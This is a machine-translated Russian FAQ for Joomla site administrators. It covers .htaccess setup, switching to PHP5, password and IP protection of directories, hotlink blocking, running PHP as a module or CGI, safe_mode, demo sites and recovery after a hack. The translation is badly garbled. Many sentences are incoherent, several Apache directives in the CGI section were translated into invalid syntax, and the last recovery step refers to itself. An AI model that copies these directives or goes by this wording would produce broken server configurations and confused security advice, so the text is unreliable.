Так как переводчик PHP работает как один экземпляр, он (AFAIK) не разобрать. Htaccess или php.ini файлов в одном каталоге. Чтобы изменить настройки php.ini, ваш компьютер должен предложить вам метод, чтобы создать или изменить собственный php.ini, или по крайней мере ее части. Вот как один из принимающих делает это: он разбирает один файл php.ini (который пользователь может изменять) один раз в час, и ставит некоторые четко определенные настройки в основном файле php.ini веб-сервера. Таким образом, пользователи могут изменять некоторые настройки для своего сайта, только, например, поворот register_globals OFF, переключение между PHP4 и PHP5.

Если ваш сервер использует FastCGI, вы можете попросить его разрешить такой метод, как выше примере, или вы можете попросить их изменить некоторые настройки для вас.

Как я могу проверить, если mod_rewrite включен?

Многие проблемы с поисковой оптимизации (SEO) возникают из того, что хозяин не включен mod_rewrite на сервере.

1. Включить SEO в вашем администратора! (Администратор> SEO> Включить> Сохранить)

2. Переименовать htaccess.txt в. Htaccess, или использовать существующие. Htaccess файл.

3. Место только следующие строки в ваш. Htaccess файл.

Options +FollowSymLinks
     Redirect /joomla.html http://www.joomla.org

4. Укажите ваш браузер: http://www.mysite.com/joomla.html

('Mysite.com "Заменить с фактическими URL вашего сайта.)

5. Если Вы будете перенаправлены на www.joomla.org, mod_rewrite работает. Если вы получили сообщение об ошибке, mod_rewrite не работает.

6. Примечание: если ваш сайт находится в суб-домен, например, "тест" необходимо изменить Htaccess следующим образом.:

Options +FollowSymLinks
     Redirect /test/joomla.html http://www.joomla.org

Как мне перейти на PHP5 использования. Htaccess?

Обзор

Много общих серверных сред в настоящее время запуска. PHP скрипты, используя PHP4 переводчика и. Php5 код, используя PHP5 переводчика. Вместо того, чтобы все ваши изменения расширений файлов, и, возможно, нарушение многие ссылки, использовать. Htaccess файл в динамически отображать одно расширение на другие.

Важную оговорку: Один из распространенных причин для этого является то, что хосты оставить PHP4 настроен с register_globals ON в целях поддержки унаследованного кода, предлагая PHP5 с register_globals OFF. Если вы находитесь на общий сервер на хост, настроил register_globals На сервере широкий, вы должны быть очень беспокоит!

Обращаясь Register Globals OFF через местные php.ini или. Htaccess файл НЕ будет предложить Вам любой дополнительной защиты. Другой эксплуатируемых счета на вашем сервере, простые взломать ваш. Для безопасности сервера, а с PHP 4.2, Register Globals выключен сервер широкий по умолчанию (PHP по умолчанию). Любой хост переопределения этого приглашает неприятности. Если вам необходимо зарегистрироваться глобальные ПО для конкретного места, простое использование. Htaccess файл, что определенный каталог, и сервер широкий безопасности не будут поставлены под угрозу. Конечно, если вы делаете это убедиться, что все сценарии осуществляется полностью дезинфицировать входных данных.

Требования

1. Ваш Apache сервер должен быть настроен для использования. Htaccess файлов. Если нет, то вы можете запросить это с вашего хоста. 2. Ваша конфигурация Apache должна позволять следующие настройки. Если нет, то вы можете запросить это с вашего хоста. 3. Ваш компьютер должен иметь настроен. PHP и. Php5 расширений файлов, как описано выше. Если нет, то они, возможно, выбрали других расширений. Проверьте с вашим хозяином.

Направления

1. Проверьте, чтобы ваш сайт настроен для использования. Htaccess файлов.

2. Сделайте резервную копию. Htaccess файл в каталоге public_http корень. Если у вас нет. Htaccess файл в этом месте, создать его сейчас.

3. Существуют различные способы установки коменданта, в зависимости от конфигурации вашего сервера. Один из следующих вероятно, будет работать. Добавьте один следующие строки в конце вашего. Htaccess файл. Если вы не уверены, какие использовать, свяжитесь с хостинг-провайдера, на котором версия лучше всего подходит для вашей конфигурации.

 

AddType x-mapp-php5 .php
AddHandler application/x-httpd-php5 .php
AddHandler cgi-php5 .php

4. Тщательно проверить.

5. Удалить резервную копию. Htaccess файл. Не оставляйте резервные копии. Htaccess файлов в публичных каталогах.

Как я могу защитить паролем каталогов с помощью. Htaccess?

Обзор

Этот раздел объясняет, как для защиты Joomla! / Администратор / на серверах Apache использованием утилиты htpasswd. Вы можете легко адаптировать эти инструкции, чтобы защитить других каталогах. Если вам нужна помощь в поиске или создании. Htaccess файл, начать здесь.

Предостережение (Из Apache.org)

Обычная проверка подлинности не должно быть считается безопасным для любого особенно строгое определение безопасной. Хотя пароль хранится на сервере в зашифрованном виде, он передается от клиента на сервер в виде обычного текста в сети. Любое воспроизведение музыки с любого сорта анализатор пакетов будет в состоянии прочитать имя пользователя и пароль в открытом виде, как она проходит через.

И не только это, но помните, что имя пользователя и пароль передаются при каждом запросе, а не только когда пользователь сначала типов их сюда Так анализатор пакетов не должны быть трансляция на особенности стратегического время, но только для достаточно долго, чтобы увидеть какой-либо одной запрос пришел через провод.

И, кроме того, само содержание также собирается в сети в открытом виде, и поэтому, если веб-сайт содержит конфиденциальную информацию, то же сниффер пакетов будут иметь доступ к этой информации как она прошла мимо, даже если имя пользователя и пароль не были использованы, чтобы получить прямой доступ к веб-сайту.

Не используйте обычную проверку подлинности для всего, что требует реальной безопасности. Это ущерб для большинства пользователей, так как мало кто будет беда, или имеют необходимое программное обеспечение и / или оборудования, чтобы узнать пароли. Однако, если кто-то желание, чтобы получить, это займет очень мало для них, чтобы сделать это.

Обычная проверка подлинности через соединение SSL, однако, будет в безопасности, так как все будет зашифрован, включая имя пользователя и пароль.

Направления

1. Если вы не знакомы с Apache htpasswd утилиты, вы можете прочитать по следующей ссылке в первую очередь. Apache аутентификации, авторизации и контроля доступа

2. Проверьте, чтобы ваш сайт настроен для использования. Htaccess файлов. Если вы не уверены, попросите хозяина.

3. Решите, где разместить. Htaccess файл. Поскольку Apache рекурсивно просматривает все каталоги в пути. Htaccess файлов, тем выше в структуре каталога вы разместите этот файл, несколько каталогов он будет контролировать. Если уже есть. Htaccess файл в каталоге вы не выбрали, это, вероятно, лучше, чтобы добавить новый код к нему.

4. Решите, где хранить и your.htpasswd. Htgroups файлов. Эти файлы никогда не должны быть доступны общественности через Интернет. Ниже приведен пример структуры каталогов показывать хорошие места для каждого файла. Заметим, что / авт / каталог, в этом примере не доступен из Интернета.

 

/home/mysite/public_html/.htaccess
/home/mysite/auth/.htpasswd/
/home/mysite/auth/.htgroups/

5. Создание. Htpasswd и. Htgroups файлы, как описано в официальной Apache HowTo, упомянутых выше. (Если вы читаете всегда актуальна и официальной документации на Apache.org, мы избавить вас от неприятностей отображения его снова здесь.)

6. Если. Htaccess файл уже существует в каталоге вы выбрали, сделать резервную копию. Если файл не существует, создайте новый файл с таким именем в настоящее время. (Не забудьте точку в начале имени.)

7. Добавить следующий код. Htaccess файл. Отрегулируйте например путей (отмечены красным цветом), сколько необходимо для Вашего сервера. Настройте имя группы, созданной на шаге 5, если она отличается от примере ниже.

 

AuthUserFile /home/auth/.htpasswd
AuthGroupFile /home/auth/.htgroups
AuthType Basic
AuthName "LWS"
require group admins

8. Испытание тщательно.

9. Удалить все резервные. Htaccess файлы из public_http каталогов.

10. Если вы не можете использовать Apache htpasswd утилита, вот бесплатно, онлайн-скрипт, который создает необходимые файлы для вас. Вам необходимо знать имя пользователя, пароль и путь. Скрипт сделает все остальное за вас. Заметим, что для более продвинутой конфигурации, такие как использование группы, вы должны будете редактировать полученные файлы.

. Htaccess Генератор: http://www.webmaster-toolkit.com/htaccess-generator.shtml

Как ограничить доступ к каталогам по IP-адресу, используя. Htaccess?

Обзор

Это может быть очень эффективным способом защиты вашего Joomla! Администратор каталога. Любой другой каталог, в public_html могут быть защищены таким же образом. Этот метод работает, только если у вас статический IP-адрес, возложенные на Вас. Любой, кто пытается, чтобы найти таких каталогов с использованием различных IP-адрес будет получить 403 Forbidden ошибки.

Направления

1. В каталоге вы хотите защитить, открыть (или создать) файл с именем. Htaccess. (Обратите внимание на точку в начале имени файла.)
2. Добавить следующий код в этом файле, заменяя 100.100.100.100 в этом примере статического IP-адреса нужно разрешить:

Order Deny,Allow
Deny from all
Allow from 100.100.100.100

* Дополнительно: Вы можете ввести частичный IP-адресов, таких как, 100.100.100. Это позволяет получить доступ к диапазону адресов.

* Дополнительно: Вы можете добавить несколько адресов, разделяя их запятыми.

100.100.100.101, 100.100.100.102

Как преобразовать файл в htaccess.txt. Htaccess файл?

Введение

При использовании PHP как модуль Apache, вы можете изменить параметры конфигурации при помощи директив в Apache конфигурационных файлов (например, httpd.conf и. Htaccess файлов). Вам нужно будет "AllowOverride Options" или "AllowOverride All" привилегии для этого. Если вы контролируете вашу собственную конфигурацию Apache, вы можете и должны использовать httpd.conf. Если вы не контролируете вашу Apache конфигурации (например, на общем сервере), вы должны использовать. Htaccess файлов.

Направления

1. Первый взгляд на файл, htaccess.txt в корневом каталоге. Это должны были быть установлены в Joomla! установки. (Заметим, что это имя файла не начинается с точки.) Открытое и внимательно прочитайте htaccess.txt. Она содержит важные предложения о том, как защитить ваш сайт.
2. Внести любые изменения в этом файле по мере необходимости для вашего сайта, а затем сохранить его в домашнем каталоге вашего сайта, как,. Htaccess (включая точку).
3. Испытание передней вашего сайта конец и задний конец. Если сообщения об ошибках, переименовать файл обратно в htaccess.txt и устранения неполадок изменения. Если вы не можете получить эту работу, вы, возможно, придется оставить файл с именем htaccess.txt.
4. Используйте phpinfo (), чтобы гарантировать, что все конфигурации множества как вы хотели. Примечание: Web-доступных файлов, которые содержат phpinfo () являются потенциальными рисками безопасности они предлагают нападающих много полезной информации о вашем сервере. Всегда удалять такие файлы после использования.

Как заблокировать прямой горячей ссылки на файлы изображений с помощью. Htaccess?

Предостережения

1. Ваш сервер должен поддерживать. Htaccess файлы для этой техники к работе.
2. Если у вас нет. Htaccess файл в корневом каталоге, см. FAQ связанные в первую очередь.
3. Не используйте этот метод, чтобы перенаправить изображение горячей ссылки на HTML-страниц или серверов, которые не являются вашими собственными.
4. Горячие связанные изображения могут быть заменены только другие изображения, а не со страниц HTML.
5. Как и с любым. Htaccess переписать, вы можете заблокировать законного трафика, такие как пользователи за прокси и брандмауэры.

Направления

1. Создать JPEG изображений называется no_hot_link.jpe. Заметим, что нечетные расширением файла (. JPE) носит умышленный характер и важно. Поместите этот файл в папке изображений.

2. Поместите следующий код в. Htaccess файл корневого каталога.

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?your_site\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/no_hot_link.jpe [L]

Объяснение

Первая строка начинается Apache переписать правила. Вторая строка соответствует любому запросов с вашего собственного сайта, здесь называют your_site.com URL. [NC] флаг означает "Ни одного случая", что означает, соответствуют верхней и нижней буквами. Третья строка позволяет пустой рефералов. Последняя строка соответствует любому файлы с расширением с расширением JPEG, JPG, GIF, BMP, PNG или. Это то заменить no_hot_link.jpe файл в папке изображений. Этот файл JPEG использует расширение JPE вместо JPG, чтобы предотвратить эти правила от блокировки вашего замены изображения. Блок горячей связи с определенных доменов

Чтобы остановить хотлинкинга с определенных доменов только, например, myspace.com, blogspot.com и livejournal.com, позволяя при этом другие веб-сайты для прямых ссылок на изображения, используя следующий код:

 

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?myspace\.com/ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?blogspot\.com/ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://(.+\.)?livejournal\.com/ [NC]
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpe [L]

 

Вы можете добавить столько различных областях, как вы хотите. Каждая строка RewriteCond кроме последнего должен заканчиваться [NC, OR] флаги. NC значит игнорировать случае. Или средства "или" Далее ", как и в, соответствии этой линии или следующей строки. Последнее RewriteCond опускает флаг или остановить соответствующий после последних RewriteCond.

Дисплей 403 Forbidden код

Кроме того, вы можете отобразить 403 Forbidden код ошибки. Замените последнюю строку предыдущего примера с этой линии:

RewriteRule .*\.(jpe?g|gif|bmp|png)$ - [F]

PHP

Почему Joomla! написанный на PHP?

Мог бы также получить его из первых уст. В ли вы PHP?, Расмус Лердорф, создатель PHP, подводит итог, как и почему PHP разработан, как это было.

"Что все это сводится к тому, что PHP никогда не должен был выиграть какую-либо конкурсов красоты Он не предназначен для каких-либо новых революционных парадигмы программирования Он был разработан для решения одной проблемы:.. Веб проблема, проблема может быть довольно уродливые, а иногда и нужно уродливые инструмент для решения вашей проблемы уродливым. Несмотря на довольно инструмент может, на самом деле, быть в состоянии решить проблемы, а также, есть вероятность, что уродливое решение PHP может быть реализован гораздо быстрее и с гораздо меньше ресурсов , что в целом суммирует упрямство PHP. "

Как я настраиваюсь на скорость, с PHP5 и MySQL5?

Это всего лишь точка за точкой резюме о том, как я был настройки и настройки нашей Joomla сайтов, чтобы получить их функционирование как можно быстрее. Для справки, мы запускаем все наши сайты с Rackspace выделенный сервер, с 1 Гб оперативной памяти, 2Ghz двойной Athlon ядра, работает Apache 2.0.x (текущая версия), PHP 5.0.x (текущей версии) и MySQL версии 5.0.18.

Они перечислены в условиях очевидного увеличения скорости - то есть, не чистой скорости для полной страницы, но скорость перед странице может использоваться для просмотра содержимого, даже если не все возможности были загружены.

1. PHP кэширования. Я бежал eAccelerator, но перешел на APC сегодня, и это сделало систему еще быстрее, чем раньше, и eAccelerator был большой прирост за некэшированной PHP. Joomla является большой сложной системой, поэтому использование скомпилированный код значительно экономить время. Я использую 128Mb в кэш-памяти, что достаточно для наших нужд.
2. MySQL Query кэширования. Это одно будет варьироваться в зависимости от того, как динамические ваш сайт, и вы можете реально убить преимущества с помощью неправильного расширения (любой дате / времени, основанный потребуется проверка), но если вы служите в значительной степени те же самые запросы каждой загрузке страницы, он сократится время загрузки заметно.
3. Шаблон оптимизации изображения - шаблон изображения действительно замедляют начальной загрузки страницы для первых посетителей, поэтому оптимизация ад из них имеет смысл. Помните, что ваш шаблон, вероятно, не собирается менять так часто, как ваша история содержания, так что вы можете позволить себе тратить больше времени на оптимизацию изображения для него, что вы бы иначе. Я рекомендую IrfanView, с PNGOUT плагин для активного PNG изображения, и это не плохо для JPG и GIF изображения либо. Не забудьте нарастить уровень сжатия PNG, и, если возможно, сводя их к индексироваться pallettes.
4. CSS сжатия. Легкий один этого - положить небольшой скрипт для вывода сжатые версии ваших CSS файл (ы) и наведите на нее index.php. Пример скрипта - я не писал, но это коротко, по существу, и работает.

 

ob_start ("ob_gzhandler");
header("Content-type: text/css");
header("Cache-Control: must-revalidate");
$offset = 60 * 60 ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);

1. Газа ненужные модули, компоненты, мамботы от Joomla. Если вы еще не использовали их, влияние на время загрузки минимальна, но с большим количеством компонентов / модулей активных, Есть более точек отказа, и Apache ошибки медленно!
2. Scrutinise журнала Apache ошибке. Удивительно, как много ошибок могут возникать даже при довольно минимальная установка Joomla, и они не обязательно влияют на внешний вид страницы. Проверьте журнал ошибок, особенно если вы используете пользовательские компоненты / модули, или любые нестандартные настройки конфигурации. Как только вы заметили какие-либо проблемы, пришло время исправить код их создания, и тщательно протестировать его перед загрузкой фиксированной версии.
3. Держите перепроверки, как вы добавить / удалить компоненты, редизайн или изменять любые параметры конфигурации сервера. Даже такие вещи, как добавление виртуальных серверов в Apache может повлиять на скорость сервера, как пропустил конфигурации установка может привести к общей задержки Apache.

 

Если PHP запущен как скрипт CGI или как модуль Apache?

Есть два способа настроить Apache для использования PHP:

1. Настройка Apache для загрузки интерпретатора PHP как модуль Apache
2. Настройка Apache для запуска интерпретатора PHP как CGI бинарных

(PS: Windows IIS нормально настраивает как CGI, кстати)

Это намерение этой должности, чтобы предоставить Вам информацию о конфигурации и признание каждого метода. "В целом" исторически только один метод или другой был реализован, однако, с архитектурных изменений, внесенных в PHP начиная с PHP5, было весьма характерно для хостинга фирм для настройки для обеих сторон. По одной из версий работает как CGI и одна версия работает в качестве модуля. Принято считать, совсем недавно, что для запуска PHP как CGI является более безопасным, однако, работает PHP, как Apache модуль имеет небольшой прирост производительности и в целом как наиболее предварительно сконфигурированные системы будет доставлен прямо из коробки.

В чем разница между CGI и Apache модуль режиме?

Модуль Apache компилируется в бинарный Apache, так что интерпретатор PHP работает в процесс Apache, это означает, что когда Apache порождает ребенка, каждый процесс уже содержит двоичный образ PHP. CGI выполняется как единый процесс для каждого запроса, и должны сделать Exec () или вилка () для PHP исполняемые, а это означает, что каждый запрос будет создавать новый процесс интерпретатора PHP. Apache является гораздо более эффективным в его способность обрабатывать запросы, и maaging ресурсов, что делает модуль Apache немного быстрее, чем CGI (а также более стабильную под нагрузкой).

CGI-режиме, с другой стороны, является более безопасным, потому что сервер в настоящее время управляет и контролирует доступ к двоичных файлов. PHP может теперь работать как собственный пользователем, а не общего пользователя Apache. Это означает, что вы можете положить ваши пароли баз данных в файл для чтения только вы и ваши скрипты могут по-прежнему к нему доступ! "Группа" и "Другие" разрешения (см. <a href="/component/option,com_easyfaq/task,view/id,73/Itemid,268/" target="_blank"> Разрешения Вопросы и ответы </ a>

теперь могут быть более строгими. CGI-режиме также утверждал, что более гибкий во многом, как вы теперь не видеть, с phpSuExec (см. " target =" _blank разрешений под phpSuExec проблемы с владельца файла, принимаемых на себя пользователь Apache, поэтому вы не должны, больше не придется проблемы по FTP при попытке получить доступ или изменять файлы, которые были загружены через интерфейс PHP, таких как Joomla! параметры загрузки.

Если ваш сервер настроен на использование PHP как модуль Apache, то вы будете иметь выбор использования либо php.ini или Apache. Htaccess файлов, однако, если ваш сервер работает PHP в режиме CGI, то Вам нужно будет только выбрать функцию php.ini файлы локально изменять параметры, как Apache больше не в полном контроле над PHP.

Тестирование и просмотра вашей установке PHP

Также известна как "Все, что вы никогда не хотели и не хотят знать о PHP"

Чтобы узнать режим PHP переводчика и вообще тестирования PHP установки и узнать огромное количество информации о среде PHP, поддерживаемых утилит, приложения и настройки, вы создаете один файл PHP, содержащий только следующие строки;

phpinfo();

Это одна строка кода выхода удивительное количество информации, имейте в виду .... <img src="http://forum.joomla.org/Smileys/joomla/wink.gif" alt="Wink" border="0" />

Сохранить файл как любое имя файла вы хотите, но с расширением ". PHP" расширение. FTP его на свой сервер и открыть его в браузере.

Другая полезная информация

Следующие функции PHP, что при запуске из PHP-файлов может обеспечить некоторую полезную информацию, (меньше, чем выше опция) многие из них должны работать на большинстве хостов, однако многие хосты отключить некоторые из этих функций для обеспечения безопасности. Нет гарантии предложило ...

Опять же, как и выше, создайте файл, назовите его, что вы хотите, но убедитесь, что он имеет ". PHP" расширения, копировать и вставлять следующие строки в его и FTP на сервер.

<?
echo "Hostname: ". @php_uname(n) ."";
if (function_exists( 'shell_exec' )) { echo "Hostname: ".
@gethostbyname(trim(`hostname`)); } else { echo "Server IP: ".
$_SERVER['SERVER_ADDR'] .""; }
echo "Platform: ". @php_uname(s) ." ". @php_uname(r) ." ". @php_uname(v) ."";
echo "Architecture: ". @php_uname(m) ."";
echo "Username: ". get_current_user () ." ( UiD: ". getmyuid() .", GiD: ". getmygid() ." )";
echo "Curent Path: ". getcwd () ."";
echo "Server Type: ". $_SERVER['SERVER_SOFTWARE'] . "";
echo "Server Admin: ". $_SERVER['SERVER_ADMIN'] . "";
echo "Server Signature: ". $_SERVER['SERVER_SIGNATURE'] ."";
echo "Server Protocol: ". $_SERVER['SERVER_PROTOCOL'] ."";
echo "Server Mode: ". $_SERVER['GATEWAY_INTERFACE'] ."";
?>

Joomla! Hisa или Joomla! Tools Suite (JTS) также может помочь определить, какой режим сервера вашего в работает в, а также предоставление большого количества другой соответствующей информации, включая рекомендации по конфигурации;

Joomla! Tools Suite (JTS) является полной "Suite" инструментов, чтобы помочь в устранении и поддерживать Joomla! и включают в себя "HISA" сценарий
<a href="http://joomlacode.org/gf/project/jts/" target="_blank"> Скачать JTS здесь </ a>

Joomla! Здоровье, установка и аудита безопасности (Хиса) является один сценарий, который обеспечивает автономную чисто информацию о конфигурации.
<a href="http://joomlacode.org/gf/project/hisa/" target="_blank"> Скачать Hisa здесь </ a>

<a href="http://forum.joomla.org/index.php/topic,136328.0.html" target="_blank"> форуме обсуждения здесь </ a>
<a HREF = "http://www.joomlatutorials.com/joomla-tips-and-tricks/40-miscellaneous-joomla-tips/114-how-to-troubleshoot-a-joomla-installation.html" целевых = " _blank "> Устранение неполадок Joomla! Установка </ a>

Другой косвенный метод, и, возможно, не на 100% надежной, что, если вы не в состоянии использовать. Htaccess на Linux хостинга и серверов на базе Apache, то вы либо работает в режиме CGI или ваш хозяин отключил использования. Htaccess, даже если сервер работает под управлением PHP, как Apache модуль.

Удалить эти файлы сразу после использования, информация, содержащаяся в их продукции очень широк и явные относительно вашего PHP и конфигурации сервера, это поможет желающим причиной вашего сайта вреда

Для желающих узнать больше о "Как ..."

Запуск PHP как модуль Apache
Чтобы настроить Apache для загрузки PHP как модуль для "разбора" Ваш PHP скрипты, httpd.conf должна быть изменена, как правило, найти в "C: \ Program Files \ Apache Group \ Apache \ conf\ \" или "/ и т.д. / HTTPD / conf/ ".

Поиск по разделу файл, который имеет ряд закомментированы "LoadModule" заявления. (Заявления с префиксом хэш знаком "#" рассматриваются как будто они были закомментированы.) Случае, если PHP работает в "Apache Модуль" режиме вы должны увидеть что-то очень похожий на следующий;

LoadModule php4_module "C: / php/php4apache.dll"

Apache 1.x

Для PHP5

LoadModule php5_module C:/php/php5apache2.dll

or (platform dependant)

LoadModule php5_module /usr/lib/apache/libphp5.so

Для PHP4

LoadModule php4_module libexec/libphp4.so

or (platform dependant)

LoadModule php4_module C: / php/php4apache.dll

и

 

AddModule mod_php4.c

или

AddModule mod_php5.c

 

Apache 2.x

For PHP5

LoadModule php5_module C:/php/php5apache2.dll

или (зависит от платформы)

LoadModule php5_module /usr/lib/apache/libphp5.so

Для PHP4

LoadModule php4_module libexec/libphp4.so

 

или (зависит от платформы)
LoadModule php4_module C: / php/php4apache.dll

и
AddModule mod_php5.c

или
AddModule mod_php4.c

Примечание:
Не волнуйтесь, что вы не можете найти "mod_php4.c" или "mod_php5.c" файл в любом месте системы. Эта директива не вызывает Apache для поиска файлов в вашей системе. Для любопытных, он определяет порядок, в котором различные модули включены по серверу Apache.

Если вы используете Apache 2.x, вам не придется вставлять директивы AddModule. Это больше не нужны в этой версии. Apache 2.x имеет свою собственную внутреннюю метод определения правильного порядка загрузки модулей.

Теперь найти "AddType" раздел в файле, а также добавить следующую строку после последней "AddType" заявление:

AddType application/x-httpd-php .php

 

Если вам нужна поддержка других типов файлов, как ".php3" и ".phtml", и просто добавить их в список, например:<

AddType application/x-httpd-php .php3
AddType application/x-httpd-php .phtml

Выполнить проверку синтаксиса и если все нормально, перезапустите Apache ...

Запуск PHP как CGI бинарных
Для настройки PHP для работы в качестве CGI, вы снова нужно будет настроить httpd.conf, но подтверждают, что выше настройки также не настроен, если вы сейчас, что вы делаете вы можете создать себе "HTTP 500" ошибки. Поиск в файле конфигурации Apache для "ScriptAlias" разделе.

Добавьте следующую строку ниже после ScriptAlias для "CGI-BIN".

Примечание:

Расположение будет зависеть от того, где PHP установлен на вашей системе, вы должны подставить соответствующий путь вместо "C: / PHP /" (например, "C: / Program Files / PHP /").

ScriptAlias /php/ "c:/php/"

Apache снова должен быть настроен для типа MIME PHP. Поиск "AddType" раздел, а также добавить следующие строки после него:


AddType применение / х-HTTPD-PHP. PHP

Как и в случае запуска PHP как модуль Apache, вы можете добавить любой расширений вы хотите Apache, чтобы признать в качестве сценариев PHP, таких как:

AddType применение / х-HTTPD-PHP. Php3
AddType применение / х-HTTPD-PHP. Phtml


Далее, вам придется указать сервер для выполнения PHP исполняемый каждый раз он сталкивается сценарий PHP. Добавить следующие ниже все существующие записи в "Action" разделе.


Действие применение / х-HTTPD-PHP "/ PHP / php.exe"

Если вы заметили, мы использовали "ScriptAlias" ведения "/ PHP /" часть будет признана ScriptAlias настроен выше, это является своего рода путь псевдоним которые коррелируют с вашего пути установки PHP настроен ранее. Другими словами, не ставьте "C: / PHP / php.exe" или "C: / Program Files / PHP / php.exe" в том, что директивы, положите

"/ PHP / php.exe", Apache Будет ли работать это, если правильно настроить.

 

Настройка страницу индекса
Этот раздел применяется ко всем пользователям, будь то загрузка PHP как модуль или работает как двоичный CGI, и было видно достаточно часто, чтобы гарантировать упоминания.

Если вы хотите, чтобы ваш PHP скрипт выполнить как страницу по умолчанию для каталога, вы должны добавить еще одну строку в "httpd.conf". Просто поиск строки в файле, который начинается с "DirectoryIndex" и добавить "index.php", чтобы список файлов в этой строке. Например, если строка, используемая для:


DirectoryIndex index.html

изменить его на

DirectoryIndex index.html index.php
Если вы все еще хотите. HTML файлы, которые будут выполняться до. PHP файлов

или
DirectoryIndex index.php index.html
Если вы хотите. PHP файлов, которые будут выполняться до. HTML файлы


В следующий раз, вы получаете доступ к сайту или каталог в сайт без имени файла, Apache будет "Авто-магическим образом" поставлять "index.php", если оно есть, или "index.html" если "index.php" не доступна.

Почему не следует использовать PHP safe_mode?

Обзор

Включение safe_mode не нужен, если другие разумные меры безопасности выполняются. Использование safe_mode для безопасности веб-сайта является плохой компромисс в сложной ситуации. Возможно, имеет смысл в некоторых ситуациях, но почти всегда лучше. Потому что safe_mode в некотором смысле дает только иллюзию безопасности, оно будет удалено из PHP начиная с версии 6.0.

Joomla! ядро работает с или без safe_mode PHP. Единственным исключением из этого правила является сценарий установки. Это потому, что safe_mode, дизайн, выключается PHP функций, которые позволяют легко загрузку файлов через веб-браузер. Если вы используете safe_mode, и необходимо выполнить установку через веб-браузер, временно отключить safe_mode выключен, и включить его обратно, когда закончите.

Некоторые сторонние расширения могут потребовать конкретных функций PHP, которые блокируются safe_mode. Такие расширения должны быть тщательно проанализированы, чтобы убедиться, что вы понимаете, почему именно они требуют таких мощных и потенциально опасных функций.

С официального сайта PHP

"PHP Safe Mode является попытка решить проблему совместно используемых серверах безопасности. Это концептуально неверно решать эту проблему на уровне PHP, но поскольку альтернативы уровня веб-сервера и операционной системы на сегодняшний день отсутствуют, многие пользователи, особенно провайдеры, используют именно защищенный режим.

Развития

Как настроить безопасный сайт демо?

В /includes/ version.php искать:

/** @var string Whether site is a production = 1 or demo site = 0 */
var $SITE = 1;
/** @var string Whether site has restricted functionality mostly used for demo sites: 0 is default */
var $RESTRICT = 0;

Для демо-сайт советуют следующее:

/** @var string Whether site is a production = 1 or demo site = 0 */
var $SITE = 0;
/** @var string Whether site has restricted functionality mostly used for demo sites: 0 is default */
var $RESTRICT = 1;

$SITE = 0
// Позволяет несколько логинов пользователей только с одной учетной записи. По умолчанию Joomla!
/ / Позволяет только один активный сеанс за счет как средство безопасности.

$RESTRICT = 1
// Отключение этих входа в систему, как Фронтальный и внутренним от изменения
/ / Данные пользователя - как пароль и имя пользователя

 

Эти настройки используются на официальном сайте демо http://demo.joomla.org

Вы должны также сделать все файлы и папки nonwriteable - особенно configuration.php файл. Также рекомендуем вам настроить автоматический хрон, что обновляет базу данных в заданный интервал времени (в нашем случае 60 минут) из БД сценарий.

Как я могу посмотреть живой сайт в то время как развивающиеся, но скрывать это от других?

Введение

Метод, описанный ниже, должны быть использованы для сравнительно незначительные изменения, такие как настройка меню или быстро реорганизации содержание разделов. Более сложные задачи, такие как установка новых компонентов или корректировке сложные настройки конфигурации должны быть выполнены и проверены на сервере разработки в первую очередь. Это не только сохранить общественный сайт и работает, но она также позволяет тестировать на досуге, тем самым сокращая количество ошибок. Один из способов сделать это является создание суб-домен (например, dev.yourdomain.com) и установить Joomla! там так же, как он установлен на вашем сайте общественности.

Направления

1. Войти, чтобы администратор раздела, и выберите: Сайт> Global Configuration.

2. Первый вариант вы видите, является создание сайта форума. Выберите "Yes" и нажмите кнопку "Сохранить". Это будет скрывать предотвратить показ всех страниц сайта, и заменить их следующим сообщением:

"This site is down for maintenance. Please check back again soon. message instead."

3. Хотя вы вошли в "задней части" системный администратор, вы можете просматривать "передней части", выбрав сайт> Шаблон> Обзор. На экране появится сайт как она будет показываться пользователям, наряду с предупреждением в верхней, что сайт закрыт на техническое обслуживание.

Site Recovery

Помогите! Мой сайт был взломан. И что теперь?

Направления

1. Изменить все соответствующие пароли: Пусть ваши пароли были собраны и немедленно сменить все пароли критической, в том числе доступ к оболочке, FTP доступ, Joomla! Учетные записи администратора, и базу данных учетных записей.
2. Проверьте сырья журналы: Определить, когда и как нападающие получили доступ к вашему сайту тщательного рассмотрения Вашего сырья логи сервера. Сделать особо отметил дата / время и имена файлов нападению. Обратите внимание, что эти журналы, возможно, были удалены или изменены, поэтому отсутствие доказательств не доказывает отсутствие активности.
3. Список недавно измененные файлы: До внесения изменений в ваш сайт, создавать список недавно измененных файлов. Вот PHP скрипт, который будет список файлов для вас. Удалить этот сценарий, как только у вас есть список и не опубликовать ссылку на него!
4. Примечание подозрительных вновь созданных файлов: Используйте этот список, чтобы определить новые файлы, которые не принадлежат. Обратите особое внимание на их создание и изменение дат, и соотнести их с даты нападения показано в системном журнале.
5. Примечание подозрительных недавно измененные файлы: Проверьте список измененных файлов для всех файлов, которые были недавно изменены. Обратите особое внимание на изменения, и соотнести их с даты нападения показано в системном журнале.
6. Проверить фиктивные хрон рабочих мест: рабочих мест Hacked хрон может быть настроен для reinfect ваш сайт снова и снова.
7. Координация с вашего хоста: Если вы определили, как вы были трещины, доклад метод к вашей машине. Если вы находитесь на общем сервере, вы можете habe был атакован через другого уязвимого сайта на сервере. Сообщить об этом с вашим хостом. Авторитетных хозяин по достоинству оценят ваши усилия в этой области.
8. Удалить весь каталог public_html: Это самый лучший способ гарантировать, что все потенциальные уязвимости в том, что сайт будет удален.
9. Удаление связанных записей из базы данных: Этот шаг может быть возможно только если у вас есть хорошие резервные копии. Простой сценарий детишек, которые только пытаются пометить страницу индекса, не могут атаковать базы данных, но профессионалы, как правило, очень заинтересованы в конфиденциальных данных, таких как пароли. Они могут представлять как сценарий детишек, чтобы избежать подозрений в то время как неоднократно уборки конфиденциальной информации из базы данных.
10. Переустановите все: Используйте готовые трещины резервных копий. Если у вас нет хороших резервных копий, перейдите к шагу 10.
